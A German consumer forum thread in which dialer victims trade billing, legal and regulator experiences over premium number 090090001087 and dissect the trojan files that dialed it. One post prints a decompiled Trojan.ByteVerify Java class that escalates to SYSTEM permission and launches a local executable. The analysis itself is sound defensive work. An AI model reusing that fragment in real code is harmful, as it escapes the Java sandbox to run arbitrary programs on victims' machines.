090090001087 !!! Ich finde den Dialer nicht!

[nomoredialerplease]

Aktueller Stand zu 090090001087

Hallo, liebe Dialergeschädigten. Heute war ein guter Tag (bis jetzt)!

Hier der neueste Stand meiner Probleme:

Anruf bei TK: TK hat den streitigen Betrag aus dem Mahnlauf vorerst bis zur Klärung rausgenommen, hat 0900/0190-Sperre veranlasst, möchte nochmals genaue Schilderung des Sachverhalts haben. Man könne dagegen halt nichts machen, wenn der dialer registriert ist. Wenn ich alles richtig gemacht habe, dann stimmt laut Datenbank kein Hash-Wert der genannten Dateien mit denen der Consul-Dingsbums überein. Ist das gut?

Anruf bei regtp: Sehr hilfsbereit, Probleme sind bekannt, aber wegen 090090001087 relativ wenige Beschwerden. Also, ran ans Telefon!!!! Hat sich die Dateien aufzählen lassen und den Kollegen die Dateien ansehen lassen. Dieser meinte, "javainfo.exe" sei der eigentliche Dialer?! Ich solle der TK richtig schön was schreiben (huch, mögen die sich nicht?), nicht klein bei geben und den Verstoss schriftlich melden. Ich kann hier nur ein dickes Lob an die Behörde aussprechen, aber es gibt ja bekanntlich unterschiedliche Erfahrungen.....

Anruf bei Rechtsschutz: Bekomme im Streitfalle anwaltliche Hilfe, schlafe also ab jetzt also wieder ruhiger...

@TSCoreNinja: Die Dateien habe ich gezippt und schicke sie Dir gerne zu. Aber: Lasse lieber erst mal die 0900/190-Sperre setzen, sonst geht es Dir womöglich wie mir.....

Meint Ihr, ich habe etwas vergessen zu unternehmen oder würdet Ihr etwas anders machen? Danke für die Hilfe!!!

@moderatoren: die regtp hat euer Forum sehr empfohlen, ist das nicht nett?

 

[Dialomat]

@ nmdp,
könntest du mir die gepackten Dateien auch nochmal zuschicken?

Mittlerweile hab ich mir ne hübsch blinkende LED an den Reset meines internen Modems gelötet. Das ist wie Weihnachten in den USA, wenn es nach Hause telefoniert und ich muss keine Angst mehr haben, dass das liebe nochmal fremdgeht...

Die javainfo.exe hat mir mein Bitdefender irgendwann moniert + verschoben, worauf ich sie sodann gelöscht hab (ich Idiot).
Das wird mir weiß Gott nie wieder passieren. Jede verdächtige Datei wandert ab jetzt in die Sicherung.

Ich kann im Nachhinein nicht mehr eindeutig sagen, was am 10.6. vor sich ging. Aber ich habe offensichtlich vom Bitdefender die Datei nctl.exe abgegriffen, die er am selben Abend als Trojan.Downloader.Small.CA klassifizierte (McAfee als TrojanDownloader.Win32.Small.ca).
Ich habe dann doch tatsächlich nirgendwo eine Beschreibung dieses Trojaners gefunden und an diesem Abend gelernt, dass eine Erkennung von Schweinkram zwar teilweise klappt, fast jeder diesen Schweinkram aber anders benennt und dazu noch nicht mal sagen kann, um was für einen Schweinkram es sich handelt (was bei 50.000+ Würmchen mittlerweile auch nicht mehr wirtschaftlich sein dürfte).

Insofern steht für mich diese nctl.exe ebenfalls unter Verdacht.
Meinungen oder Erkenntnisse?

 

[TSCoreNinja]

Re: NETZWELT PLUS GmbH - 090090001087

javainfo.exe im Verzeichnis=c:\windows\java
rqdg.exe in c:\windows\temp

Zweimal der gleiche Trojaner. Anscheinend relativ unbekannt. Bitdefender bezeichnet ihn als Trojan. Downloader. Small. Gen, andere Virenprogramme erkennen ihn nicht. Dieser laedt die unten angefuehrte Datei icon.exe herunter, siehe angehaengten Screenshot vom Debugger Fenster. BTW, Download ist derzeit tot.

icon.exe in c:\windows\temp (Name in Dateieigenschaften: krass.exe)

upx-gepacktes Programm, tatsaechlich weitestgehend identisch mit der Datei bellasde.exe. Enthaelt jedenfalls Windows API Aufrufe zu RasDialA, auch wenn ich die Datei noch nicht zum Waehlen bekommen habe.

jhs21B5.tmp.bat in c:\windows\temp

Loescht den Dialer.

 

[Anonymous]

090090001087, NETZWELT PLUS GmbH

habe auch das selbe Problem. Für 47 Sekunden muss ich 29,95Euro bezahlen. Habe bei der DT reklamiert und dann eine Ablehnung bekommen.

Gestern habe ich den Betrag überwiesen, sonst würde ein von DTAG beauftragter Anwalt mit mir Kontackt aufnehmen, so ist von einer Beraterin der DT.

Was kann man dann tun, fühle mich hilflos...

 

[Reducal]

Re: 090090001087, NETZWELT PLUS GmbH

Was kann man dann tun, fühle mich hilflos...

Wenn das Geld erst einmal überwiesen ist, dann kannst Du es nahezu abschreiben. Es sei denn, Du kämpfst dafür, auf dem zivilen Rechtsweg.
Eine Empfehlung hätte ich aber noch - wende Dich doch mal mit einer nachvollziehbaren Argumentation an die Netzwelt plus in Heppenheim. Teile denen Deine Telefonnummer mit, damit die die Session nachvollziehen können und warte mal deren Reaktion ab.

 

[Anonymous]

Re: 0900-9 Dialer 9000 1087 Dateien

und der Hammer dabei ist das die Modemlautstärke auf 0 gesetzt wird, trotz dialog "laut" gewählt.

Hi!

Hatte das selbe Problem. Bei mir steht der Lautstärkeregler auch auf laut, das Modem bleibt aber trotzdem stumm. Wo kann ich das in der Registry ändern?

MfG

 

[TSCoreNinja]

Re: 0900-9 Dialer 9000 1087 Dateien

und der Hammer dabei ist das die Modemlautstärke auf 0 gesetzt wird, trotz dialog "laut" gewählt.

Hi!

Hatte das selbe Problem. Bei mir steht der Lautstärkeregler auch auf laut, das Modem bleibt aber trotzdem stumm. Wo kann ich das in der Registry ändern?

MfG

Tiefer Blick in die Data Section der icon.exe zeigt etwas wie folgt:

SYSTEM\CurrentControlSet\%s\%04u\Settings
Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}
Services\Class\Modem
DialPrefix

Such doch mal nach solchen Schluesseln, da muesste es irgendwo zu finden sein.

@Unkown Programmer:
das binaere Komplement ist keine sinnvolle Verschluesselung der Data Section :bash:

 

[nomoredialerplease]

Hallo liebe "Dialergemeinde",

zur Netzwelt plus GmbH gibts unter diesem link

http://www.spammer-hammer.de/pages/start/berichte/netzwelt_plus/nwp-anzeige2004-06-16_1.htm

Interessantes zu lesen

Da erübrigt sich doch schon die Frage, ob man es hier mit einem seriösen Anbieter zu tun hat, oder irre ich mich?

Viele Grüße und: kämpfen, bis die Schwarte kracht!!!

 

[Anonymous]

Re: 0900-9 Dialer 9000 1087 Dateien

Tiefer Blick in die Data Section der icon.exe zeigt etwas wie folgt:

SYSTEM\CurrentControlSet\%s\%04u\Settings
Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}
Services\Class\Modem
DialPrefix

Such doch mal nach solchen Schluesseln, da muesste es irgendwo zu finden sein.

Vielen Dank für den Tipp.
Wer das selbe Problem hat und nicht viel mit Ninjas Tipps anfangen kann sei geholfen:
Ausführen -> Regedit
Strg + F für Suche -> dort nach DialPrefix suchen (s.o.)
Den Wert für SpeakerMode_Dial von M0 auf M1 ändern
fertig

 

[Anonymous]

Danke für den Tipp, bei wurde von diesem Dialer die Lautstärke auch auf Null gestellt.

Ist aber schon ein starkes Stück.

 

[Gabriela]

Hallo Zusammen

habt ihr schon den thread von der 090090001090 - Nummer gelesen ?

http://forum.computerbetrug.de/viewtopic.php?t=5656&postdays=0&postorder=asc&start=345

die haben die Zeitschrift c´t angeschrieben

Heise Newsticker schrieb:
Offensichtlich Opfer eines illegalen Dialers wurde der Mehrwertdienste-Anbieter QuestNet. In einer offiziellen Stellungnahme teilt das Unternehmen mit, dass es die Dialer-Rufnummer 09009/0001090 außer Betrieb genommen hat. Grund dafür war nach Angabe des Unternehmens ein von einem niederländischen Werbepartner eines QuestNet-Kunden in Umlauf gebrachter illegaler Dialer, der sich unbemerkt einwählte. Pro Anwahl fanden überraschte Kunden 29,95 Euro auf der Rechnung.
Nach eigenen Angaben wollte QuestNet durch die Abschaltung sicherstellen, dass Kunden nicht geschädigt werden. Allerdings dürfte es für das Unternehmen nun auch schwierig werden, die Entgelte für die betroffene Rufnummer einzutreiben, da sich die Kunden auf den in Umlauf befindlichen illegalen Dialer berufen können. Das Unternehmen beklagt "hohe Umsatzeinbußen" aufgrund des Vorfalls, ohne allerdings eine konkrete Schadenssumme zu nennen. (uma/c't)
Quelle:
http://www.heise.de/newsticker/meldung/48945

und jetzt haben sie es schwarz auf weiß,

und nun reagiert auch QN

und was ist nun mit uns ???

 

[Anonymous]

Mich hatte auch der Dialerwahn erwischt, insgesamt netto 230 Euro für
090090001090 /88 /87.
Habe dann die Rechnung um den Betrag gekürzt, mir das ok von der Rechtschutzversicherung geholt und bin mit dem ganzen mist zum Anwalt.
Der meinte ich bräuchte mir keine Sorgen machen, er hätte im letzten Jahr viele derartige Fälle gehabt und noch nie hätte ein Mandant bezahlen müssen.
Das wichtigste ist das Ihr erst garnicht bezahlt! Hinter dem Geld herrennen ist viel schwieriger !
Man brauch auch garnicht beweisen dass man einen Dialer auf dem Rechner hatte. Es gilt die Beweislastumkehr- die müssen beweisen dass Ihr einen legalen Dialer bentzt habt und eine Leistung dafür bekommen habt- und das können die Firmen nicht

 

[nomoredialerplease]

090090001087 und javainfo.exe/icon.exe

Mich hatte auch der Dialerwahn erwischt, insgesamt netto 230 Euro für
090090001090 /88 /87.

Wie ist es denn bei Dir zur Einwahl der Nummer 90090001087 gekommen? Ist die Datei Dir bekannt? Würde mich mal interessieren. Nach Auskunft der RegTP war es die javainfo.exe, nach Auskunft des Forumsmitglieds TSCoreNinja war es die Datei icon.exe.

@TSCoreNinja:
Kannst Du zu meinen Dateien schon etwas näheres sagen?

@Gabriela:
Hat bei Dir die Sicherung der Dateien geklappt?

 

[TSCoreNinja]

Re: 090090001087 und javainfo.exe/icon.exe

@TSCoreNinja:
Kannst Du zu meinen Dateien schon etwas näheres sagen?

Nicht mehr, als auch so schon kurz angedeutet.

Die javainfo.exe ist ein Trojaner, der die icon.exe auf die Platte holt, und vermutlich noch ein paar andere uebele Sachen macht. Im Zusammenspiel mit der icon.exe macht der vermutlich noch etwas mehr, da das Programm ob toten Downloads aber abbricht, ist das nicht nachzuvollziehen. Und die icon.exe hat die entscheidenden Routinen zur Anwahl drin, aber keine Rufnummer. Vermutlich holt der sich die aus dem Netz... Leider fehlen auch die Kommandozeilenparamter, die im Aufruf verwendet werden.
Andererseits reicht dies definitv, um einen Missbrauch zu untermauern...

Gr,
TSCoreNinja

 

[Qoppa]

Das wichtigste ist das Ihr erst garnicht bezahlt! Hinter dem Geld herrennen ist viel schwieriger !
Man brauch auch garnicht beweisen dass man einen Dialer auf dem Rechner hatte. Es gilt die Beweislastumkehr- die müssen beweisen dass Ihr einen legalen Dialer benutzt habt und eine Leistung dafür bekommen habt

So ist es. Aber man sollte daran erinnern, daß diese sog. Beweislastumkehr in Dialerfällen nicht jedem Anwalt und jedem Richter bekannt ist (siehe nebenstehenden Fall), - daher ist es, um sicherzugehen, wichtig diese Argumentation ausführlich (und auf den eigenen Fall bezogen) vorzutragen.

Interessant auch die Erfolgsquote Deines Anwalts. Umgekehrt muß das heißen, daß sich immer noch viele von den Drohungen einschüchtern lassen und lieber zahlen anstatt sich zu wehren ...

 

[nomoredialerplease]

Re: 090090001087 und javainfo.exe/icon.exe

TSCoreNinja schrieb:
"Nicht mehr, als auch so schon kurz angedeutet.

Die javainfo.exe ist ein Trojaner, der die icon.exe auf die Platte holt, und vermutlich noch ein paar andere uebele Sachen macht."

Jetzt habe es sogar ich begriffen

Vielen Dank nochmal...

....und allen ein schönes Wochenende!!!

 

[Gabriela]

Hallo
@nomoredialerplease
ja hab paar Dateien noch gefunden,
aber das sind so Dateien mit "zahlen+bustaben".class
also so ein "class"-Datei-Typ sagt mir nix,
aber das soll der Trojaner sein, weil unser Anti-Virus Programm das als solches erkannt hat.

und dann noch diese, aber nur als Excel-Datei, weil ich diese nicht speichern konnte:

VerifierBug.class
Backup of an infected file 896 bytes Trojan.ByteVerify
Dienstag, 1. Juni 2004 12:48:04

BB.class
Backup of an infected file 19.4 KB Trojan.ByteVerify
Dienstag, 1. Juni 2004 12:48:04

Beyond.class

Backup of an infected file 1.91 KB Trojan.ByteVerify
Dienstag, 1. Juni 2004 12:48:04

Kann einer von euch damit was anfangen ???

Gabi

 

[TSCoreNinja]

VerifierBug.class
Backup of an infected file 896 bytes Trojan.ByteVerify
Dienstag, 1. Juni 2004 12:48:04

Kann einer von euch damit was anfangen ???

Einst auch aufgefunden in der "Installation" vom Matlock Dialer. Dank Kristallkugel kann ich auch sagen, was die macht (zur Anschauung fuer Java-Kundige der ). Irgendwo im Matlock Thread steht auch das Microsoft Security Bulletin

public class Beyond
{

    public static void Work(String s)
    {
        try
        {
            PolicyEngine.assertPermission(PermissionID.SYSTEM);
            String s1 = System.getProperty("os.name").toLowerCase();
            if(s1.startsWith("windows"))
            {
                Worker worker = new Worker();
                worker.Work();
                Runtime.getRuntime().exec("C:\\web.exe" + s);
            }
        }
        catch(Throwable throwable)
        {
            System.out.println(throwable.toString());
        }
    }

    public Beyond()
    {
        try
        {
            PolicyEngine.assertPermission(PermissionID.SYSTEM);
            String s = System.getProperty("os.name").toLowerCase();
            s.startsWith("windows");
        }
        catch(Throwable throwable)
        {
            System.out.println(throwable.toString());
        }
    }
}

Koenntest Du mir mal bitte die *.class Files zuschicken? Dann guckt ich da mal rein (gezippt an eine PN anhaengen).
Interessant waere es auch, wenn Du eine Datei mit der Endung jar findest, die zum Datum passt.
Gr,
TSCoreNinja

 

[Gabriela]

@ TSCoreNinja

Du müßtest jez Post haben

 

[Anonymous]

Ich find den dialer nicht, hab aber 75 ? kosten!!

hallo! trotz regelmäßigem einsatz von spybot und antivir hab ich mir den dialer eingefangen und der hat auch gleich satte 75 ? kosten verursacht!
leider find ich keinerlei verdächtige programme auf meinem rechner!!!
wie werde ich ihn wieder los????
danke für die hilfe! götz